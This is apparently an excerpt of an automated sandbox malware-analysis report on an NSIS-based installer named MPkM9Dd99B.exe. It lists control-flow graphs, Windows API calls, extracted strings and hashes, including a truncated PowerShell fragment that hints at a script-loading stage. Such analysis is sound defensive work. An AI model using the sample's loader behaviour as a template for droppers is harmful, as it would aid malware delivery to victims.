                                control_flow_graph 0 4033d8-403428 SetErrorMode GetVersionExA 1 403469 0->1 2 40342a-403444 GetVersionExA 0->2 3 403470 1->3 2->3 4 403446-403465 2->4 5 403472-40347d 3->5 6 403494-40349b 3->6 4->1 7 403490 5->7 8 40347f-40348e 5->8 9 4034a5-4034e5 6->9 10 40349d 6->10 7->6 8->6 11 4034e7-4034ef call 4066b5 9->11 12 4034f8 9->12 10->9 11->12 17 4034f1 11->17 14 4034fd-403511 call 406647 lstrlenA 12->14 19 403513-40352f call 4066b5 * 3 14->19 17->12 26 403540-4035a0 #17 OleInitialize SHGetFileInfoA call 40628d GetCommandLineA call 40628d 19->26 27 403531-403537 19->27 34 4035a2-4035a6 26->34 35 4035ab-4035be call 405c4a CharNextA 26->35 27->26 31 403539 27->31 31->26 34->35 38 40367f-403683 35->38 39 4035c3-4035c6 38->39 40 403689 38->40 41 4035c8-4035cc 39->41 42 4035ce-4035d5 39->42 43 40369d-4036b7 GetTempPathA call 4033a7 40->43 41->41 41->42 44 4035d7-4035d8 42->44 45 4035dc-4035df 42->45 53 4036b9-4036d7 GetWindowsDirectoryA lstrcatA call 4033a7 43->53 54 40370f-403727 DeleteFileA call 402f31 43->54 44->45 47 403670-40367c call 405c4a 45->47 48 4035e5-4035e9 45->48 47->38 63 40367e 47->63 51 403601-40362e 48->51 52 4035eb-4035f1 48->52 59 403640-40366e 51->59 60 403630-403636 51->60 57 4035f3-4035f5 52->57 58 4035f7 52->58 53->54 68 4036d9-403709 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4033a7 53->68 69 4037ba-4037cb ExitProcess OleUninitialize 54->69 70 40372d-403733 54->70 57->51 57->58 58->51 59->47 62 40368b-403698 call 40628d 59->62 65 403638-40363a 60->65 66 40363c 60->66 62->43 63->38 65->59 65->66 66->59 68->54 68->69 75 4037d1-4037e0 call 4059a3 ExitProcess 69->75 76 403928-40392e 69->76 73 403735-403740 call 405c4a 70->73 74 4037ab-4037b2 call 403a96 70->74 91 403742-40376b 73->91 92 403776-40377f 73->92 85 4037b7 74->85 79 403930-403945 GetCurrentProcess OpenProcessToken 76->79 80 4039a6-4039ae 76->80 86 403976-403984 call 4066b5 79->86 87 403947-403970 LookupPrivilegeValueA AdjustTokenPrivileges 79->87 83 4039b0 80->83 84 4039b3-4039b6 ExitProcess 80->84 83->84 85->69 97 403992-40399d ExitWindowsEx 86->97 98 403986-403990 86->98 87->86 94 40376d-40376f 91->94 95 403781-40378f call 405d0d 92->95 96 4037e6-40380a call 40590e lstrlenA call 40628d 92->96 94->92 99 403771-403774 94->99 95->69 107 403791-4037a7 call 40628d * 2 95->107 111 40381b-403830 96->111 112 40380c-403816 call 40628d 96->112 97->80 102 40399f-4039a1 call 40140b 97->102 98->97 98->102 99->92 99->94 102->80 107->74 116 403835 111->116 112->111 118 403839-403865 wsprintfA call 406320 116->118 121 403867-40386c call 405897 118->121 122 40386e call 4058f1 118->122 126 403873-403875 121->126 122->126 127 403877-403881 GetFileAttributesA 126->127 128 4038af-4038ce SetCurrentDirectoryA call 406066 CopyFileA 126->128 129 4038a0-4038a8 127->129 130 403883-40388c DeleteFileA 127->130 128->69 136 4038d4-4038f5 call 406066 call 406320 call 405926 128->136 129->116 133 4038aa 129->133 130->129 132 40388e-40389e call 405a4f 130->132 132->118 132->129 133->69 144 4038f7-4038ff 136->144 145 403918-403923 CloseHandle 136->145 144->69 146 403905-40390d call 406620 144->146 145->69 146->118 149 403913 146->149 149->69
                                APIs
                                • SetErrorMode.KERNELBASE(00008001), ref: 004033FB
                                • GetVersionExA.KERNEL32(?), ref: 00403424
                                • GetVersionExA.KERNEL32(0000009C), ref: 0040343B
                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403504
                                • #17.COMCTL32(?,00000008,0000000A,0000000C), ref: 00403541
                                • OleInitialize.OLE32(00000000), ref: 00403548
                                • SHGetFileInfoA.SHELL32(00429448,00000000,?,00000160,00000000,?,00000008,0000000A,0000000C), ref: 00403566
                                • GetCommandLineA.KERNEL32(Ifrende Setup,NSIS Error,?,00000008,0000000A,0000000C), ref: 0040357B
                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000020,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000000,?,00000008,0000000A,0000000C), ref: 004035B5
                                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000008,0000000A,0000000C), ref: 004036AE
                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C), ref: 004036BF
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036CB
                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C), ref: 004036DF
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036E7
                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C), ref: 004036F8
                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C), ref: 00403700
                                • DeleteFileA.KERNELBASE(1033,?,00000008,0000000A,0000000C), ref: 00403714
                                • ExitProcess.KERNEL32(?,?,00000008,0000000A,0000000C), ref: 004037BA
                                • OleUninitialize.OLE32(?,?,00000008,0000000A,0000000C), ref: 004037BF
                                • ExitProcess.KERNEL32 ref: 004037E0
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe",00000000,?,?,00000008,0000000A,0000000C), ref: 004037EF
                                • wsprintfA.USER32 ref: 00403846
                                • GetFileAttributesA.KERNEL32(Bje gka",C:\Users\user\AppData\Local\Temp\,Bje gka",?,0000000C), ref: 00403878
                                • DeleteFileA.KERNEL32(Bje gka"), ref: 00403884
                                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Bje gka",?,0000000C), ref: 004038B0
                                • CopyFileA.KERNEL32(C:\Users\user\Desktop\MPkM9Dd99B.exe,Bje gka",00000001), ref: 004038C6
                                • CloseHandle.KERNEL32(00000000,"$Beseen=gc -raw ',"$Beseen=gc -raw ',?,Bje gka",00000000), ref: 00403919
                                • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C), ref: 00403936
                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040393D
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403951
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403970
                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403995
                                • ExitProcess.KERNEL32 ref: 004039B6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuewsprintf
                                • String ID: "$"$Beseen=gc -raw '$"C:\Users\user\Desktop\MPkM9Dd99B.exe"$1033$A$Bje gka"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth$C:\Users\user\AppData\Local\Temp\Gutturotetany\dearth\Forsmgtede$C:\Users\user\Desktop$C:\Users\user\Desktop\MPkM9Dd99B.exe$Error launching installer$Ifrende Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$Under i$$\Temp$`KXu$~nsu%X.tmp
                                • API String ID: 3308099279-3817090802
                                • Opcode ID: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                                • Instruction ID: 7f7404e7af7d96985e5cf9c88e74da5f08b6bc5144b1890d42f960bb7a69135c
                                • Opcode Fuzzy Hash: 421d5eb472970c8e9273ab7cabbfa33fc046e403f42b0bf6beeb9477a4c27e51
                                • Instruction Fuzzy Hash: E2F11570904254AADB21AF758D49BAF7EB8AF45706F0440BFF441B62D2CB7C4A45CB2E
                                Function 0040550F Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 150 40550f-40552b 151 405531-4055f8 GetDlgItem * 3 call 404362 call 404c53 GetClientRect GetSystemMetrics SendMessageA * 2 150->151 152 4056ba-4056c0 150->152 175 405616-405619 151->175 176 4055fa-405614 SendMessageA * 2 151->176 154 4056c2-4056e4 GetDlgItem CreateThread CloseHandle 152->154 155 4056ea-4056f6 152->155 154->155 157 405718-40571e 155->157 158 4056f8-4056fe 155->158 161 405720-405726 157->161 162 405773-405776 157->162 159 405700-405713 ShowWindow * 2 call 404362 158->159 160 405739-405740 call 404394 158->160 159->157 172 405745-405749 160->172 165 405728-405734 call 404306 161->165 166 40574c-40575c ShowWindow 161->166 162->160 169 405778-40577e 162->169 165->160 173 40576c-40576e call 404306 166->173 174 40575e-405767 call 4053d1 166->174 169->160 170 405780-405793 SendMessageA 169->170 177 405890-405892 170->177 178 405799-4057c5 CreatePopupMenu call 406320 AppendMenuA 170->178 173->162 174->173 179 405629-405640 call 40432d 175->179 180 40561b-405627 SendMessageA 175->180 176->175 177->172 187 4057c7-4057d7 GetWindowRect 178->187 188 4057da-4057f0 TrackPopupMenu 178->188 189 405642-405656 ShowWindow 179->189 190 405676-405697 GetDlgItem SendMessageA 179->190 180->179 187->188 188->177 191 4057f6-405810 188->191 192 405665 189->192 193 405658-405663 ShowWindow 189->193 190->177 194 40569d-4056b5 SendMessageA * 2 190->194 195 405815-405830 SendMessageA 191->195 196 40566b-405671 call 404362 192->196 193->196 194->177 195->195 197 405832-405852 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 195->197 196->190 199 405854-405874 SendMessageA 197->199 199->199 200 405876-40588a GlobalUnlock SetClipboardData CloseClipboard 199->200 200->177
                                APIs
                                • GetDlgItem.USER32(?,00000403), ref: 0040556E
                                • GetDlgItem.USER32(?,000003EE), ref: 0040557D
                                • GetClientRect.USER32(?,?), ref: 004055BA
                                • GetSystemMetrics.USER32(00000002), ref: 004055C1
                                • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004055E2
                                • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004055F3
                                • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405606
                                • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405614
                                • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405627
                                • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405649
                                • ShowWindow.USER32(?,00000008), ref: 0040565D
                                • GetDlgItem.USER32(?,000003EC), ref: 0040567E
                                • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040568E
                                • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004056A7
                                • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004056B3
                                • GetDlgItem.USER32(?,000003F8), ref: 0040558C
                                  • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,00000001,00404192), ref: 00404370
                                • GetDlgItem.USER32(?,000003EC), ref: 004056CF
                                • CreateThread.KERNELBASE(00000000,00000000,Function_000054A3,00000000), ref: 004056DD
                                • CloseHandle.KERNELBASE(00000000), ref: 004056E4
                                • ShowWindow.USER32(00000000), ref: 00405707
                                • ShowWindow.USER32(?,00000008), ref: 0040570E
                                • ShowWindow.USER32(00000008), ref: 00405754
                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405788
                                • CreatePopupMenu.USER32 ref: 00405799
                                • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004057AE
                                • GetWindowRect.USER32(?,000000FF), ref: 004057CE
                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004057E7
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405823
                                • OpenClipboard.USER32(00000000), ref: 00405833
                                • EmptyClipboard.USER32 ref: 00405839
                                • GlobalAlloc.KERNEL32(00000042,?), ref: 00405842
                                • GlobalLock.KERNEL32(00000000), ref: 0040584C
                                • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405860
                                • GlobalUnlock.KERNEL32(00000000), ref: 00405879
                                • SetClipboardData.USER32(00000001,00000000), ref: 00405884
                                • CloseClipboard.USER32 ref: 0040588A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                • String ID:
                                • API String ID: 590372296-0
                                • Opcode ID: ab14618a2fdcd9c268bec1058c916e7d70e9859125749bfc909000d0c8dffae2
                                • Instruction ID: 4cf6c47baa67300a2587cb91bb909ead9d18e5d8973f7e879562a42f7fe873d6
                                • Opcode Fuzzy Hash: ab14618a2fdcd9c268bec1058c916e7d70e9859125749bfc909000d0c8dffae2
                                • Instruction Fuzzy Hash: 58A16A71A00609FFDB11AFA0DE89EAE7BB9EB44354F40403AFA44B61A0C7754D51DF68
                                Function 00405A4F Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 514 405a4f-405a75 call 405d0d 517 405a77-405a89 DeleteFileA 514->517 518 405a8e-405a95 514->518 519 405c18-405c1c 517->519 520 405a97-405a99 518->520 521 405aa8-405ab8 call 40628d 518->521 522 405bc6-405bcb 520->522 523 405a9f-405aa2 520->523 529 405ac7-405ac8 call 405c66 521->529 530 405aba-405ac5 lstrcatA 521->530 522->519 525 405bcd-405bd0 522->525 523->521 523->522 527 405bd2-405bd8 525->527 528 405bda-405be2 call 406620 525->528 527->519 528->519 538 405be4-405bf8 call 405c1f call 405a07 528->538 531 405acd-405ad0 529->531 530->531 534 405ad2-405ad9 531->534 535 405adb-405ae1 lstrcatA 531->535 534->535 537 405ae6-405b04 lstrlenA FindFirstFileA 534->537 535->537 539 405b0a-405b21 call 405c4a 537->539 540 405bbc-405bc0 537->540 550 405c10-405c13 call 4053d1 538->550 551 405bfa-405bfd 538->551 548 405b23-405b27 539->548 549 405b2c-405b2f 539->549 540->522 542 405bc2 540->542 542->522 548->549 552 405b29 548->552 553 405b31-405b36 549->553 554 405b42-405b50 call 40628d 549->554 550->519 551->527 556 405bff-405c0e call 4053d1 call 406066 551->556 552->549 558 405b38-405b3a 553->558 559 405b9b-405bad FindNextFileA 553->559 564 405b52-405b5a 554->564 565 405b67-405b72 call 405a07 554->565 556->519 558->554 563 405b3c-405b40 558->563 559->539 562 405bb3-405bb6 FindClose 559->562 562->540 563->554 563->559 564->559 567 405b5c-405b65 call 405a4f 564->567 574 405b93-405b96 call 4053d1 565->574 575 405b74-405b77 565->575 567->559 574->559 577 405b79-405b89 call 4053d1 call 406066 575->577 578 405b8b-405b91 575->578 577->559 578->559
                                APIs
                                • DeleteFileA.KERNELBASE(?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405A78
                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AC0
                                • lstrcatA.KERNEL32(?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AE1
                                • lstrlenA.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AE7
                                • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*,?,?,75573410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MPkM9Dd99B.exe"), ref: 00405AF8
                                • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405BA5
                                • FindClose.KERNEL32(00000000), ref: 00405BB6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                • String ID: "C:\Users\user\Desktop\MPkM9Dd99B.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz930C.tmp\*.*$\*.*
                                • API String ID: 2035342205-1670686335
                                • Opcode ID: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                • Instruction ID: da8d20c05f1c1589987c6f576fa29bd8846dab181693994c0c241c39a5f8a394
                                • Opcode Fuzzy Hash: 78f2e0e18cb785759574f080630192df6ebe3391163db671d7f5c390f5c48f83
                                • Instruction Fuzzy Hash: 3051C030904A04BADB21AB618C85FAF7AB8EF42754F14417FF445B11D2C77C6982DEAE
                                Function 00406620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileA.KERNELBASE(75573410,0042BCD8,C:\,00405D50,C:\,C:\,00000000,C:\,C:\,75573410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 0040662B
                                • FindClose.KERNEL32(00000000), ref: 00406637
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID: C:\
                                • API String ID: 2295610775-3404278061
                                • Opcode ID: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                • Instruction ID: 21071efbed15a2f64541de492f8ee2fd881da0b051754d52d90be6cd238fbd17
                                • Opcode Fuzzy Hash: 5cd1aebe143dc129e49842c5f71a26c727f8c2dbc53d2570feaf901eef8a8c0e
                                • Instruction Fuzzy Hash: 08D012355490205BC64017396F0C85BBA599F163717118E37F8A6F12E0CB758C7296DC
                                Function 00403E33 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 201 403e33-403e45 202 403e4b-403e51 201->202 203 403fac-403fbb 201->203 202->203 204 403e57-403e60 202->204 205 40400a-40401f 203->205 206 403fbd-404005 GetDlgItem * 2 call 40432d SetClassLongA call 40140b 203->206 207 403e62-403e6f SetWindowPos 204->207 208 403e75-403e7c 204->208 210 404021-404024 205->210 211 40405f-404064 call 404379 205->211 206->205 207->208 213 403ec0-403ec6 208->213 214 403e7e-403e98 ShowWindow 208->214 216 404026-404031 call 401389 210->216 217 404057-404059 210->217 219 404069-404084 211->219 222 403ec8-403eda DestroyWindow 213->222 223 403edf-403ee2 213->223 220 403f99-403fa7 call 404394 214->220 221 403e9e-403eb1 GetWindowLongA 214->221 216->217 236 404033-404052 SendMessageA 216->236 217->211 218 4042fa 217->218 230 4042fc-404303 218->230 227 404086-404088 call 40140b 219->227 228 40408d-404093 219->228 220->230 221->220 229 403eb7-403eba ShowWindow 221->229 231 4042d7-4042dd 222->231 233 403ee4-403ef0 SetWindowLongA 223->233 234 403ef5-403efb 223->234 227->228 240 4042b8-4042d1 DestroyWindow KiUserCallbackDispatcher 228->240 241 404099-4040a4 228->241 229->213 231->218 239 4042df-4042e5 231->239 233->230 234->220 242 403f01-403f10 GetDlgItem 234->242 236->230 239->218 243 4042e7-4042f0 ShowWindow 239->243 240->231 241->240 244 4040aa-4040f7 call 406320 call 40432d * 3 GetDlgItem 241->244 245 403f12-403f29 SendMessageA IsWindowEnabled 242->245 246 403f2f-403f32 242->246 243->218 273 404101-40413d ShowWindow KiUserCallbackDispatcher call 40434f EnableWindow 244->273 274 4040f9-4040fe 244->274 245->218 245->246 247 403f34-403f35 246->247 248 403f37-403f3a 246->248 250 403f65-403f6a call 404306 247->250 251 403f48-403f4d 248->251 252 403f3c-403f42 248->252 250->220 254 403f83-403f93 SendMessageA 251->254 256 403f4f-403f55 251->256 252->254 255 403f44-403f46 252->255 254->220 255->250 259 403f57-403f5d call 40140b 256->259 260 403f6c-403f75 call 40140b 256->260 271 403f63 259->271 260->220 269 403f77-403f81 260->269 269->271 271->250 277 404142 273->277 278 40413f-404140 273->278 274->273 279 404144-404172 GetSystemMenu EnableMenuItem SendMessageA 277->279 278->279 280 404174-404185 SendMessageA 279->280 281 404187 279->281 282 40418d-4041c7 call 404362 call 403e14 call 40628d lstrlenA call 406320 SetWindowTextA call 401389 280->282 281->282 282->219 293 4041cd-4041cf 282->293 293->219 294 4041d5-4041d9 293->294 295 4041f8-40420c DestroyWindow 294->295 296 4041db-4041e1 294->296 295->231 298 404212-40423f CreateDialogParamA 295->298 296->218 297 4041e7-4041ed 296->297 297->219 299 4041f3 297->299 298->231 300 404245-40429c call 40432d GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 298->300 299->218 300->218 305 40429e-4042b1 ShowWindow call 404379 300->305 307 4042b6 305->307 307->231
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E6F
                                • ShowWindow.USER32(?), ref: 00403E8F
                                • GetWindowLongA.USER32(?,000000F0), ref: 00403EA1
                                • ShowWindow.USER32(?,00000004), ref: 00403EBA
                                • DestroyWindow.USER32 ref: 00403ECE
                                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403EE7
                                • GetDlgItem.USER32(?,?), ref: 00403F06
                                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403F1A
                                • IsWindowEnabled.USER32(00000000), ref: 00403F21
                                • GetDlgItem.USER32(?,00000001), ref: 00403FCC
                                • GetDlgItem.USER32(?,00000002), ref: 00403FD6
                                • SetClassLongA.USER32(?,000000F2,?), ref: 00403FF0
                                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00404041
                                • GetDlgItem.USER32(?,00000003), ref: 004040E7
                                • ShowWindow.USER32(00000000,?), ref: 00404108
                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040411A
                                • EnableWindow.USER32(?,?), ref: 00404135
                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040414B
                                • EnableMenuItem.USER32(00000000), ref: 00404152
                                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 0040416A
                                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 0040417D
                                • lstrlenA.KERNEL32(0042A488,?,0042A488,00000000), ref: 004041A7
                                • SetWindowTextA.USER32(?,0042A488), ref: 004041B6
                                • ShowWindow.USER32(?,0000000A), ref: 004042EA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1446968029.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1446950244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446982334.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1446996476.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1447089030.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_MPkM9Dd99B.jbxd
                                Similarity
                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                • String ID:
                                • API String ID: 121052019-0
                                • Opcode ID: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                                • Instruction ID: 7c61018aff81ba8050a36ffdf8d01ac8e149416bf37329b2a87c27abd1a4edd3
                                • Opcode Fuzzy Hash: 839e81d427f6c58c85d128010f5d9028c8a9196b72fb1deba7765417e8979c48
                                • Instruction Fuzzy Hash: 60C1F4B1600205ABD7206F61EE49E2B3BBCEB85749F51053EF681B11F1CB799842DB2D
                                Function 00403A96 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
